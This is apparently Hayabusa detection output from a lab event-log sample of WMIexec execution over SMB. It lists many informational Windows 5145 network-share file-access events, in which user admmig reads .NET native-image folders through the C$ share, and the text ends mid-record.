10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 